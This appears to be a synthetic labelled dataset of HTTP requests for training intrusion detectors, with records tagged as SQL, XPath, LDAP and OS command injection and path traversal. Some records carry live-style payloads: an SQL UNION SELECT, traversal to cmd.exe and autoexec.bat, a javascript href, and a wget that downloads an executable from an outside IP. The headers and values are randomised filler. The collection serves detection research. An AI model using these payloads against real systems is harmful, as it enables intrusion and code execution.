Last-Modified: Sun, 03 May 09 22:25:28 CET
Host: www.daetSnaly.net
Connection: t1Tiaqr
Accept: image/png, audio/*;q=0.6, audio/*
Accept-Charset: x-mac-arabic, iso-8859-6, x-mac-icelandic;q=0.9, iso-8859-15;q=0.1, x-mac-turkish
Accept-Encoding: identity, deflate;q=0.4, deflate
Accept-Language: hdq-soent, i-he;q=0.7, doirrNsg-h;q=0.6, dn0Tgt-ra;q=0.2
Cache-Control: max-age=964
Client-ip: 19.200.37.172
Cookie: ielSyYRCseeeal=ropt
Cookie2: $Version="188"
Date: Mon, 22 Mar 10 17:55:03 GMT
ETag: W/"gxWAy1gUg-O0T03RwB"
Expect: feazi6
From: dyenT@gpt6glsG.cz
If-Modified-Since: Thu, 22 May 08 06:18:58 UTC
If-Unmodified-Since: Thu, 08 Dec 05 08:17:29 UTC
If-Match: *
If-None-Match: *
If-Range: "iDGLXhjkjg.ZIa96k"
Max-Forwards: 6399
MIME-Version: 0.8
Pragma: lilA=orelE4Tr
Proxy-Authorization: o1svi Elj40=bhoesO1
Authorization: 8eeq bSihE=Gspcil
Range: 462-
Referer: /O2Rmtgit/cudev/itttiAeo/rttazh/saNqIo0.tiff
TE: deflate,trailers
User-Agent: ovjrGUn http://www.dsvo6his.cz
UA-Color: color32
UA-Pixels: 1199x1516
Via: FTP/2.3 www.Edityfik.js, Ar9s/1.7 90.180.35.219, 7.8 www.a4Ieoorn.jpg
Transfer-Encoding: gzip
Warning: 061 205.79.84.252 "trdaeY" "Tue, 09 Nov 04 20:27:34 CET"
X-Forwarded-For: 183.74.153.68
X-Serial-Number: 4765773
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

ve9fWhso9=8sajnadmocha&6ilttmhrah=4&8Z8yMinsert-v56@=wm&br9eistuhe=Etjlfy&ec5Ohrws=o;|%ekyrfbm<[iiQYrbe&tOstb=zNSmjq@d.&ljtms5liysml=yfxnx&nwhs5=<a     href =   "     javas&#99;ript&#35;[alert   ('cyyy');]"   >&ysso9= z&TryN=uySvkS7HBKqu

End - Id: 46770
Start - Id: 35552
class: XPathInjection
POST /r._Q4B-oGQBwyC5Lv/eerapnaEto3ote/vrarapez9mra/etToeyAUhEousl/e-kSjkrw@Fu22KXI/5r/tss/atagctxe1Afouz5s/raeiNase/tBevIivUhjZ_uPcuGNl/6Lwb_.2sSep2JUIT1JLv/buTAb.htm? HTTP/1.1
Content-Length: 257
Content-Language: kaydflg,aEa2iti
Content-Encoding: identity
Content-Location: /j4EIt/bser/avc8DnOa/2yhauo.pl
Content-MD5: b2lkY29ubnVpc3VmdjhodQ==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 19 Jul 05 20:59:35 GMT
Last-Modified: Sun, 05 Jul 09 14:14:48 CET
Host: 78.244.0.25
Connection: anoAmoAu
Accept: */*
Accept-Charset: iso-8859-1;q=0.4, iso-8859-1
Accept-Encoding: 
Accept-Language: ii-s9an
Cache-Control: only-if-cached
Client-ip: 89.252.62.136
Cookie: 6a0h6eaUtnraei=1168427;lsock_streamYncxvarN=r2
Cookie2: $Version="705"
Date: Tue, 02 Feb 10 02:17:06 GMT
ETag: "-FwfO-oPyhjIc7MMKhL"
Expect: 100-continue
From: r6prr@rraoosa.cz
If-Modified-Since: Sun, 06 Jul 08 20:29:05 GMT
If-Unmodified-Since: Fri, 02 Dec 05 23:20:52 UTC
If-Match: *
If-None-Match: "sMuaH3d4ST58x.S"
If-Range: "P1Lm2sc8jzbbKrH_S"
Max-Forwards: 85
MIME-Version: 7.5
Pragma: no-cache
Proxy-Authorization: len2te ytHaNuew=yalote
Authorization: Basic RWZldjpkcmVlbmRpbQ==
Range: 6-856001,00687-28
Referer: http://Fmtdtao.biz/fmiin.mdb
TE: gzip;q=0.6
Trailer: If-Match
User-Agent: uitlao (dN5WTr)
UA-CPU: 68000
UA-Disp: 0509,6144,16
UA-Pixels: 5895x804
Via: 3.2 57.24.69.189, 2.2 179.239.59.119, FTP/0.6 www.fe2anub.gif
Transfer-Encoding: gzip
Upgrade: ihret/7.1, korlrr/8.1, oqs1/4.8, miil/4.8, mtdoz/9.8
Warning: 559 www.obo9.js "F7ceoat8n5sa5ne" "Wed, 18 Nov 09 09:39:58 UTC"
X-Forwarded-For: 20.224.84.217
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

ehus=eita4y|aU&tlot3amg=4yemmupcwchuEzirDx&Rsspahcettepioo=per&LPPsock_stream@M8w=(i     <     count(ahhw/child::text())    and j  <   count(20zsse/child::comment())   and k    <     count(eld/child::*)    )

End - Id: 35552
Start - Id: 49754
class: XPathInjection
GET /d-V/3Ut/q1Cj2L-PAca.asmx?rho=Idi0ln&ooihAtatHa42=075662500&Uael0n=Shlibumenie&dco=+&w6=ee%3EarmLaccess_log%409input+%3Ak%3Bnasamt7&F3clperlH_7W=641&7gioo=7850&p3ymwohx=%3Edt&nLGT=owdtSem%27++++or+path%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3DN%5D++++or++++%27rmHiEge%27++++%3D++++%27&GVdvsupdate=sEqa.BTtaT8q&n5=8605152&_eetczPOI_=110 HTTP/1.1
Host: www.oood2.gov:86
Connection: close
Accept: audio/basic;q=0.8, text/*;q=0.7
Accept-Charset: x-mac-roman, x-mac-greek;q=0.6, shift_jis;q=0.4
Accept-Encoding: deflate;q=0.9, identity, gzip;q=0.5, gzip;q=0.5
Accept-Language: sytd6it-3en8jaWe;q=0.3, wb-syywR, rn-tt, fw-siai
Cache-Control: no-transform
Client-ip: 187.113.146.146
Cookie: Qs-.S_=ruqIssj ;lup8i=8;t-NmochabinkX7=su0;3lythbs8n=325
Cookie2: $Version="0"
Date: Sun, 10 Jan 10 22:08:56 CET
ETag: W/"C6vM2QmYRX16nGaa"
Expect: t8nua
From: 1ni9pe@Genwbli.net
If-Modified-Since: Wed, 09 Aug 06 21:32:23 GMT
If-Unmodified-Since: Fri, 03 Dec 04 15:36:52 UTC
If-Match: "_V5wS2.XBUlro.abv.H"
If-None-Match: "yRTqUh.zN_gEXj28llO5"
If-Range: Tue, 15 Apr 08 17:44:15 CET
Max-Forwards: 7
MIME-Version: 6.2
Pragma: no-cache
Proxy-Authorization: aaoe afoasci=wwir
Authorization: NTLM c2dlZ2VvbG9pTmZla25DRmV0ZWVoMDBvZXRhbGFteER0Nzdud0U=
Range: 75-,6326-9694,9570-
Referer: /kenl/te8Asn/auOot0/eemoEe.asp
TE: trailers,gzip;q=0.9
Trailer: Cache-Control
User-Agent: usiIAe (ttDN_2Y8; t8PBG57rUD; oQcSjh; tgW@GiwGY)
UA-CPU: x86
UA-Disp: 7451,3171,32
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 3095x7377
Via: 3.6 124.173.151.89, 9.8 246.106.168.180
Transfer-Encoding: deflate
Upgrade: pksat/0.9, it6/4.7, Atv/0.3, zos/6.7, aoE/5.6
Warning: 781 www.hoetei.html "9scprerIsitC95r" "Thu, 17 Feb 05 10:38:24 GMT"
X-Forwarded-For: 246.149.155.68
X-Serial-Number: 9273829516846529
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49754
Start - Id: 36865
class: LdapInjection
GET /N.M4_tbetweenRKNd7Q4g.bin?adt0spki=r&y9Seanttnh=074&n7lYOia=ie%3Evshttp7erasNvo&SlBN3caebn=075&qal=9311&8a8o=3006&NJopenhHxyG=55&etwfhWdolsmP=bPso%7Csertj%2Bsa&pNpxuXwp-=dR&chcsenaeshhoeg=fia%28er&vpBrshttafUeeSN=3ajl HTTP/1.0
Host: 245.13.178.236
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: gzip, deflate, gzip;q=0.0, gzip;q=0.6
Accept-Language: )  (|  (displayName=had*)(name    = had*)(mail=had*)
Cache-Control: no-cache
Client-ip: 17.48.219.199
Cookie: ie4leeaaw=9f<wp-hho
Cookie2: $Version="498"
Date: Sat, 17 Nov 07 22:43:08 GMT
ETag: W/"mnWVuBc9h.e5LQFzDJL"
Expect: 100-continue
If-Modified-Since: Thu, 19 Mar 09 18:04:43 CET
If-Unmodified-Since: Mon, 04 Jan 10 13:52:16 UTC
If-Match: "nLMIvQJXW6d_8J8Yx_"
If-None-Match: *
If-Range: *
Max-Forwards: 5
MIME-Version: 1.6
Pragma: no-cache
Proxy-Authorization: NTLM VGhldGpocnR0dHJpdjhjdG9ocnNuY2Vhc25leWZ5ek9ybg==
Authorization: NTLM aXBoa3IzdGV2cnRjb0VhZUVvbzl5YXQ4dWU1V09zYWFkZXRlbmlsYQ==
Referer: /oktGlvoi/clbPA/eotvolnn.js
TE: trailers,chunked,gzip
Trailer: If-None-Match
User-Agent: Mozilla/5.4 (Machintosh; U; Mac OS X 9.9; ok-en; rv:6.4.0) Gecko/92128848
UA-Disp: 2222,7626,16
UA-Color: color8
UA-Pixels: 9247x246
Via: 9.0 183.44.67.255:68, HTTP/6.9 www.easw.shtml
Transfer-Encoding: gzip
X-Forwarded-For: 207.34.209.252
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~

null

End - Id: 36865
Start - Id: 49408
class: XPathInjection
GET /f4r/.C6GqH@G/Xn/owdTsGeSZO7tMe7.NUx@/poH0eZKo1KHC/cJF/DVE/odcde/d_PlUbDZWyLyulGVi9x/tmeOiDeousfrohny/cp2IHLcO5-X_i.mdb?nwc4J1srLsd=558061&5h7s_AuJc=fsjnidbsiopgth&F-wyC0qn8V=hzbbhaving9&o6iUtntpiyeqi=s2V-89XRrH0o&hehhaeyNnons=rnrierha%27+++or+++path%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3DN%5D+++or++%27si7rinSu%27++++%3D+++%27 HTTP/1.0
Host: www.6Jzb3ao.ch
Connection: epenMaa
Accept: */*
Accept-Charset: cp-936;q=0.8, iso-10646-ucs-2, euc-tw;q=0.8, iso-8859-7, iso-8859-7;q=0.7
Accept-Encoding: *
Accept-Language: sos-7pr, i-ps, 3eiha-ieesN, YaOce-r5ospr
Cache-Control: no-cache
Client-ip: 86.141.178.217
Cookie: 8d1oil5=tsop1cry1y;aa5oeN8=367716408;ouodRdadnt=778;Ys8qiydNe=8t a2rinor4replace;Es@XNgTrsrnf=55
Cookie2: $Version="6"
Date: Thu, 01 Nov 07 08:56:58 UTC
ETag: W/"rUzInsOwOf8G0X7o-"
Expect: a1tnai
From: 2etopwi@exrhsnpxt.org
If-Modified-Since: Sat, 27 Mar 04 09:12:39 CET
If-Unmodified-Since: Thu, 25 Mar 04 23:29:24 UTC
If-Match: "nLXGlp.YicHgt0-"
If-None-Match: *
If-Range: Thu, 08 Oct 09 06:54:41 GMT
Max-Forwards: 353
MIME-Version: 9.7
Pragma: no-cache
Proxy-Authorization: Basic bmhvaW9vOnR0bm9zdTY=
Authorization: o6hk nUnoo9=kdsnx
Range: 708062-
Referer: http://www.asmST.gov/i7esi/2ulsn/gssEr.js
TE: trailers,gzip
Trailer: If-Range
User-Agent: mhaomeo/8.9.2
UA-CPU: StrongARM
UA-Disp: 7200,5804,16
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 334x4748
Via: 0.4 www.rnel.jpg, culrLe/8.7 131.60.168.121
Transfer-Encoding: deflate
Upgrade: dec/5.5, 4kklt/1.7
Warning: 126 www.pasdeh3.jpeg "fnretdemeps9cSe7" 
X-Forwarded-For: 151.48.131.243
X-Serial-Number: 37054990
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49408
Start - Id: 35999
class: PathTransversal
POST /eDGPDGt/seOe/usSn/dZmXtm5.4CLOpZxyIZ9j/grorgep/e0/s3M/ieua5tfs/enue5eCny1/kT/AipsLooajUypoo/2ddnSgene4Rqrod.gif? HTTP/1.1
Content-Length: 165
Content-Language: sdaiw
Content-Encoding: compress
Content-Location: /3copa.dll
Content-MD5: c2xlaG9nNXg0cG90ZWVzbg==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 24 Mar 05 11:25:58 GMT
Last-Modified: Sun, 19 Aug 07 13:02:45 GMT
Host: 242.175.28.65:80
Connection: keep-alive
Accept: */*;q=0.4
Accept-Charset: windows-1250, iso-8859-7;q=0.4, iso-8859-6;q=0.9, windows-1250;q=0.4, iso-2022-kr;q=0.2
Accept-Encoding: *
Accept-Language: J44Teto2-t2;q=0.4, hsee-sn;q=0.5, Deapes-h0uto2;q=0.5, c-b
Cache-Control: no-transform
Client-ip: 27.34.193.196
Cookie: ee3tn9s6smte8=dn8vtRbmtotah;ifnedhhotljgr=tossxilcrefn
Cookie2: $Version="232"
Date: Fri, 25 Sep 09 01:44:24 GMT
ETag: W/"z@mku5d_bz8gZ96"
Expect: 100-continue
From: rA7tR@tqia61e.ch
If-Modified-Since: Thu, 10 Aug 06 10:39:54 UTC
If-Unmodified-Since: Mon, 19 Jun 06 20:40:34 GMT
If-Match: "Dz@NEzwdnh2mHynFDBs"
If-None-Match: *
If-Range: Sun, 07 Mar 10 01:51:44 CET
Max-Forwards: 4
MIME-Version: 5.1
Pragma: no-cache
Proxy-Authorization: NTLM YXRlb2F1ZHJFMWhvaWVlbHJzTHRYZWU3MWRkb29nb3Q=
Authorization: Basic dHR0NGNvdTptZG9EZHl1
Range: 4611-51,7-,2106-
Referer: http://www.8cao0vmt.st/hsomoot/h3amdeiu.bin
TE: chunked,trailers,chunked
Trailer: Accept-Encoding
User-Agent: t0nTme
UA-OS: Win98
UA-Pixels: 551x993
Via: 1.1 231.169.214.196, 2.7 105.213.1.233, 0.1 www.owoo7t.css
Transfer-Encoding: compress
Upgrade: uUi/7.8, eeds/2.6, Myede/4.4
Warning: 420 www.esiroa.js "tdoieaa" "Wed, 03 Jan 07 09:34:59 GMT"
X-Forwarded-For: 133.228.168.254
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

d0e8sbNWep8ftr=mslzy&9scrlOiVdmsea=../../../../../../WINDOWS/autoexec.bat&Oyen=1hv&o4i=e&Q0QCWwhereaccess_log-=aPt1crd6nhhe&WCXpsVlocationT=jvbyZrsKBpE

End - Id: 35999
Start - Id: 42018
class: SqlInjection
GET /8ry4oleaoq5viyd/ezoe6cajhi8sarTnao/n1FOP/8atecvdv9idd/tbsrmPSejnihdOos/iospja1eyia/tgx8/meos1sff8scvnrirn.jsp?enhehuctrpd=doEe3hGuuoaand&QYYRa0fmocha=10&osooNnse=319&ldaprrguatAI=anodeuqto%5Ct%26t&tk2=48134945&jnernt0yrnc1h=95&oatisocrn2h5s=%27++OR++%27Eyregwe3h%27++++%3D+++++N%27+++++&W5@HhexecKst=8221312&umtimIePrntt=ueweeetfersowd8e&mehrnkr=escE%7Cd2&meIugubyai4=orjtne4etne2see5 HTTP/1.1
Host: 230.13.234.213
Connection: keep-alive
Accept: image/jpeg;q=0.6
Accept-Charset: windows-1257;q=0.1, ks_c_5601-1987, cp-950;q=0.3, ks_c_5601-1987, euc-kr;q=0.0
Accept-Encoding: gzip, gzip, identity, deflate;q=0.8, deflate
Accept-Language: exo-qut
Cache-Control: max-age=81524
Client-ip: 144.52.64.113
Cookie: ldeeptxIH=va;-3YJmpr_=q;position9zTgCzW5=877
Cookie2: $Version="334"
Date: Wed, 24 Mar 04 14:51:39 CET
ETag: "RNqO_dyGb@AGbsbMlT4j"
Expect: 2ltBltn8=r1t9hTn5
From: etDdz@s1Ttlneied.ch
If-Modified-Since: Fri, 24 Feb 06 05:09:41 GMT
If-Unmodified-Since: Thu, 15 Jan 09 10:48:56 CET
If-Match: "Grhx@b@7p0VR3nv"
If-None-Match: *
If-Range: "eNZE@sxZvflBCrhC"
Max-Forwards: 82
MIME-Version: 9.3
Pragma: no-cache
Proxy-Authorization: iaijaB rjera=cnidom
Authorization: Digest opaque="4venij"
Range: -2,-9858,-988607
Referer: /t8tahler/rxne2/fstHuek/9enhin.mdb
TE: gzip;q=0.4
Trailer: Date
User-Agent: vghybbIy81 http://www.5eiylhou.fr
UA-CPU: StrongARM
UA-Disp: 442,012,8
UA-OS: Win98
UA-Color: color8
UA-Pixels: 0057x268
Via: HTTP/9.9 219.108.58.27, 5.0 www.isfe.js:7, FTP/7.0 74.204.27.126
Transfer-Encoding: ncge6; mb73t3n=nUkss
Upgrade: 1ra/6.0, 2yNai/3.3, a1ejc/1.5, osRwie/7.4, e6bte/5.7
Warning: 583 www.veos.jpg "tedi" 
X-Forwarded-For: 58.152.231.239
X-Serial-Number: 063116688396663
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~

null

End - Id: 42018
Start - Id: 37714
class: LdapInjection
POST /2V/mMHmtmbCdqX/fl/lq/f4buwF3GS5yyY.mdb? HTTP/1.0
Content-Length: 190
Content-Language: tuesx
Content-Encoding: identity
Content-Location: http://www.eHwo0pIe.cz/cefu/iPamhzy/jeortee.txt
Content-MD5: dWVhYVdpd3Nyb01sbmRycg==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 26 Feb 07 05:51:42 UTC
Last-Modified: Tue, 29 Sep 09 04:35:16 GMT
Host: www.ethD.org
Connection: fs7Mn
Accept: text/*;q=0.5
Accept-Charset: *
Accept-Encoding: identity, deflate;q=0.4
Accept-Language: e-su, octh-nuoenzh, Dmtb-eot, ee-oocuT, br-6eni1y
Cache-Control: only-if-cached
Client-ip: 34.15.76.194
Cookie: eadthfm=525;woNfOilt=5177;oaufsrqawecO=6Fmdh@;haloy4onerlnt=elles7uta e;etnejek=oevrvnsreuh;iumSso6uEn=m
Cookie2: $Version="321"
Date: Wed, 14 Apr 04 03:36:36 CET
ETag: W/"Cs9xygawlnPcuJ3Z1I"
Expect: 100-continue
If-Modified-Since: Wed, 25 Oct 06 05:51:16 UTC
If-Unmodified-Since: Mon, 04 Oct 04 15:56:13 UTC
If-Match: "gYAAsNsvRjUtupT"
If-None-Match: *
If-Range: Sat, 20 Mar 10 13:55:19 CET
Max-Forwards: 0483
Pragma: no-cache
Authorization: NTLM U2VhdWVyZUFuc21laG5pZWFwMXd5aGVleWNvY3JhQWVlbWxTdA==
Referer: /octume/eZrw.pdf
TE: trailers,trailers
Trailer: Connection
User-Agent: ytLm (i1l6yOa; fzRbgp; d@Tcs7o9S; l6kpHtV; iB1C_Zq)
UA-CPU: MIPS
UA-Disp: 999,847,16
UA-Color: color16
UA-Pixels: 8766x859
Via: 4.1 0.232.200.177:4, 7.3 127.159.87.14, 6.1 www.eetnf.tiff
Transfer-Encoding: gde8
Upgrade: beagd/0.0, 8at/9.9, elr/1.5, luY/7.5
X-Forwarded-For: 34.122.30.225
X-Serial-Number: 053115321
~~~~~: ~~~~~~~~~~~

niwia2evo68n=20412&4iaN6q=roerecsd&lDjl3VNob=fe1Faemv&isjte=1i Wea7sock_streamree0&rtmEba4falhhb=219&eaguAqsotT9isaN=iv)(&(objectClass   =   hcpr*)&3ir=knin8an&hHirGrnr9gh=591820

End - Id: 37714
Start - Id: 35568
class: XPathInjection
PUT /tcoeelh3tinue/rdR8U_9-KR7Y_/tzgonelapn0iasne/owdjeAWeMUvn6y5Ljsy/JrCmeta/hhaaenozlotaot7h2l.cfm? HTTP/1.0
Content-Length: 310
Content-Language: au3znn
Content-Encoding: deflate
Content-Location: http://www.eneh.biz/gnsec/gIs0iUf/sagshtpv/hOrAsqo/miuorh.asp
Content-MD5: dFRyeW91YWhoZFVuYXJlbA==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 28 Jul 04 17:58:10 UTC
Last-Modified: Wed, 12 Sep 07 06:52:20 GMT
Host: www.engs7hbxea.uk:6
Connection: udp9eea9
Accept: audio/basic;q=0.6, audio/*, audio/basic;q=0.3
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *;q=0.0
Cache-Control: max-stale
Date: Sun, 14 Mar 04 20:37:27 CET
Expect: n4hotni
From: ahbcn@7uOaisTed.cz
If-Modified-Since: Wed, 29 Nov 06 17:35:54 CET
If-Unmodified-Since: Mon, 18 Jul 05 18:38:03 CET
If-Match: *
If-Range: "FgdN5eUc4Q-yS@HkQ"
Max-Forwards: 6
Pragma: odde=rt1mros
Proxy-Authorization: Basic ZkxpYW86bXR5OWh1Mg==
Authorization: ijahws phanff=EduvrfKn
Referer: http://www.aU0nam00.biz/eieneVsa/aucnq/ayhmhtL.fgf
Trailer: Accept
User-Agent: Mozilla/5.3 (compatible; Konqueror/0.2; Mac OS X; wunla; aoafs)
UA-CPU: Sparc
UA-Color: color16
UA-Pixels: 101x5961
Via: 4.0 www.rdoac.shtml
Warning: 503 www.2ereIoft.tiff "stHrxpgsdfyTd3soor" 
----: ---------------

keah=i61h0maa0ne&vnssnsudeuj=ti4a']    |  P  |   //user[    name/text(    ) = 'ktrht&jtL=7&kt2uratrnDppf=l8&othoteug=uo5oieanog hrps&h3fcxh8ngn2nxa=968&eriira=ew 7&fihnelaE=4769&fn=58&eyw1r=0mbnhttstjr4r6noa&k9VlchildShttpNUiframe@=enHls13nOtnnqrcaEa&te7on7eeo6ztE=aisyi2whT+ iah conn

End - Id: 35568
Start - Id: 43145
class: OsCommanding
GET /4v6vcfX.shtml?elUesecA31n=2285458243&3innaeeeebtoe2=teisqs&E6ldbhthu3sco=r%40zOrZ_Vx&t.0spPv7=itcjcneSmloe0r&yj-IidyQ=632247669&.WZtPaa=rbi&ndU0lhYv=%3Cu&eAehglyi=733299&bkdyv25gW.g=%5Cn+++++wget+++http%3A%2F%2F199.246.69.123%3A743%2Fnftp.exe&3UHrgq@TENY=6739&pOsYKfromncLUN=docp%3Angaid&ivi0ligeo=ixtre+&bl=yl%29eroHn6xrtandmE HTTP/1.1
Host: 251.237.190.3
Connection: hiNel3u8
Accept: */*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: ts8he-it1KBatt;q=0.5, r-idEwSin, Awci-p, eegdnnFp-t6mT7rti;q=0.2
Cache-Control: no-store
Client-ip: 44.100.206.106
Cookie: mnnHro7=1;seetagllS=iUSZn;soveim=usNi;npyubfl8n=BEpoo5o4adt
Cookie2: $Version="11"
Date: Wed, 27 May 09 03:08:55 UTC
ETag: "xp7WlUFTEtl@0cqPOnSz"
Expect: riuusi2e=neiyivtb
From: agaiu@h1the.st
If-Modified-Since: Wed, 27 Oct 04 01:09:11 UTC
If-Unmodified-Since: Sat, 03 Mar 07 20:32:54 CET
If-Match: "oUAIxRo4fdxA6VYt"
If-None-Match: "mhjSf-DRCZu.Wxk.J5"
If-Range: "Dr1UN7YVdxvt-oIEZ_i"
Max-Forwards: 9
MIME-Version: 2.9
Pragma: no-cache
Proxy-Authorization: cenn vpwg=rlsiiwt
Authorization: edserI rUz4lnq=e8Ee9
Range: 46359-,93372-15,76-
Referer: /rktlV3t/ViwaksF/deoerq/tese.mdb
TE: chunked;q=0.2,gzip;q=0.3
Trailer: Expect
User-Agent: dA0.BH http://www.Pit3ntk.biz
UA-CPU: Sparc
UA-Disp: 391,012,8
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 699x046
Via: 9.4 138.92.104.80:13
Transfer-Encoding: identity
Upgrade: Iur/4.0, hdo/8.3, gni/0.5, ntt7e1/5.3
Warning: 854 50.62.44.9:3189 "2eaaior" "Sat, 19 Feb 05 12:47:49 UTC"
X-Forwarded-For: 1.132.119.183
X-Serial-Number: 197146981100118
----: ------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43145
Start - Id: 44369
class: OsCommanding
GET ..%c1%8s...%c1%8s..%c1%8s..%c1%8s..%c1%8s../winnt/system32/cmd.exe?/c+dir HTTP/1.0
Host: 173.137.132.2
Connection: h4nbt4t
Accept: application/*;q=0.6
Accept-Charset: *;q=0.6
Accept-Encoding: 
Accept-Language: 8ihctsf-sc;q=0.5, e-c;q=0.7
Cache-Control: min-fresh=1278
Client-ip: 5.40.112.96
Cookie: meilfiiue6grl=291561649;dSgroup byo3hLaccess_logYdl9=492260;BfRVO@.81R=cOdROL;e6hi8QtdupoNdh=en64tRN;tgmnssnaauDust=4;okobe=8saHacEeyhph~bn
Cookie2: $Version="768"
Date: Sat, 14 Jul 07 06:40:09 GMT
ETag: W/"o4@mSRlI7dOqkgmEd"
Expect: p4ymocrd
From: tdMWtde@lyHrvnefs.fr
If-Modified-Since: Thu, 05 Nov 09 01:53:09 UTC
If-Unmodified-Since: Sat, 01 Dec 07 03:58:54 GMT
If-Match: *
If-None-Match: *
If-Range: "usvv7nHn.nQv.BAuoaKB"
Max-Forwards: 2
MIME-Version: 2.7
Pragma: no-cache
Proxy-Authorization: NTLM Tkdzb2VtdHRnYnlwY1VuaW41b3NlaG5saW9iYWVsdGloeXk=
Authorization: Digest qop=auth
Range: -126597,56874-704
Referer: http://www.eidnfEt.de/ipm1n/ennn.msf
TE: gzip;q=0.8
Trailer: Cache-Control
User-Agent: fpr-fD.Co http://www.sIAeH.com
UA-CPU: x86
UA-Disp: 0327,603,32
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 347x4806
Via: FTP/2.2 179.149.219.154, 6.1 www.eotXLt.gif, 7.8 www.p7hb.tiff
Transfer-Encoding: compress
Upgrade: HeiarI/6.4, enio/6.7, DHqogf/0.4
Warning: 732 www.nidnAqoh.js "estaore5gordngon0ar" "Fri, 26 Nov 04 13:07:04 GMT"
X-Forwarded-For: 179.136.110.96
X-Serial-Number: 94309776768789
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44369
Start - Id: 41828
class: SqlInjection
GET /OJB-3-etco@IhtpassT8r.gif?evaleTshutdownnRFja=me&xpnkroiaMrp=%27UNIONALLSELECTfieldFROMveatesWHERE%27%27+%3D+++%27&lsliagp=lanin2ciurftaiera&idsefjemnnc=919877&sra3timnbrip=jh3n&lHca1b2h=nrli&ndogx9cEedthI=al-0&mithdsahxnooS=sconnectbutyarm3passwde0Ti+%3Fa&udwDdw5=72076784&hnejhmdNtbR=d0darkoreuPlgra5p%29style HTTP/1.0
Host: 49.52.124.13:5
Connection: iboaJosL
Accept: audio/basic;q=0.0, application/x-tar;q=0.0, audio/basic;q=0.5
Accept-Charset: iso-2022-jp;q=0.4, koi8, gb2312;q=0.6
Accept-Encoding: identity, identity, identity
Accept-Language: *;q=0.2
Cache-Control: max-age=8022
Client-ip: 66.228.253.107
Cookie: npdn=rlbn;htosr2niP=073824882;poeza=> ib;Fb=8;YCfromwDzOS8nw=Se
Cookie2: $Version="7"
Date: Sat, 28 Nov 09 08:36:29 CET
ETag: W/"sEO6-Hh4WcNew12P"
Expect: jao4e=iser
From: wIdO@lerc.gov
If-Modified-Since: Sat, 06 Sep 08 10:56:55 UTC
If-Unmodified-Since: Thu, 05 Jul 07 20:59:01 GMT
If-Match: "uksNWcbA@zsg4cd"
If-None-Match: "s3oQO.K0pDBrHcoMoKeU"
If-Range: Fri, 13 Jan 06 18:15:16 GMT
Max-Forwards: 220
MIME-Version: 5.5
Pragma: no-cache
Proxy-Authorization: berie 8peinf=aesruuT
Authorization: NTLM NG1lc29vaHRGd3F0ZWxzZWc5YnJlY3NhaWlvMmpuaDlzbGVlYm1uRWU0bnlt
Range: -0842
Referer: /cKefi/orbT/esedotc.gif
TE: trailers
Trailer: Max-Forwards
User-Agent: Mozilla/3.5 (compatible; MSIE 2.1; Open BSD i586; ibz0qR9sri)
UA-CPU: StrongARM
UA-Disp: 0572,127,8
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 5914x483
Via: HTTP/1.6 www.o2o2rtes.gif, 0.4 61.159.11.145
Transfer-Encoding: identity
Upgrade: hcsrst/2.9, leHto/5.0, t6B/6.8, iheSt/9.4
Warning: 186 127.58.150.59 "ns2cjsi" "Mon, 05 May 08 16:07:50 GMT"
X-Forwarded-For: 206.140.252.134
X-Serial-Number: 431124702375
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41828
Start - Id: 44297
class: OsCommanding
GET /scripts/file.bat" "& dir c:/ .exe? HTTP/1.1
Host: 187.130.3.202
Connection: close
Accept: */*;q=0.1
Accept-Charset: *;q=0.9
Accept-Encoding: compress, identity;q=0.5
Accept-Language: *;q=0.9
Cache-Control: no-cache
Client-ip: 86.249.82.37
Cookie: uiao=v:t;b9adtisiucnhSda=NtllargineEaha;ifbt=vr665oenrtneoYmt;eameb0ende=autoexecall;qvaPij=s o5a
Cookie2: $Version="583"
Date: Thu, 22 Dec 05 22:30:39 CET
ETag: "z-wEaS4pP5@ex2B"
Expect: 100-continue
From: l1Bt7@hnsv2sT9.net
If-Modified-Since: Mon, 26 Jul 04 09:17:10 CET
If-Unmodified-Since: Wed, 07 Mar 07 09:55:10 GMT
If-Match: *
If-None-Match: *
If-Range: "PnObIr1--fPNEcLS0iL"
Max-Forwards: 9390
MIME-Version: 6.6
Pragma: no-cache
Proxy-Authorization: NTLM b1dmc2ZsdHh6cmV0d2F0dDlsYmlkYWhpc2lrcW5kYWFlOHJ1Zw==
Authorization: wnaeh oheL=ooeioN
Range: 3-
Referer: /lwifsh/dsoXt.avi
TE: chunked,trailers,trailers
Trailer: If-Match
User-Agent: Mozilla/5.1 (compatible; MSIE 6.1; Unix; lbDmeaeicn)
UA-CPU: PowerPC
UA-Disp: 9070,4804,16
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 521x0746
Via: Tei8/8.8 205.87.46.2
Transfer-Encoding: compress
Upgrade: ucktla/1.6
Warning: 525 251.120.159.217 "ay2yetttoyyhQsouLs" 
X-Forwarded-For: 81.125.200.90
X-Serial-Number: 7359375071
----: --------------------------------------------
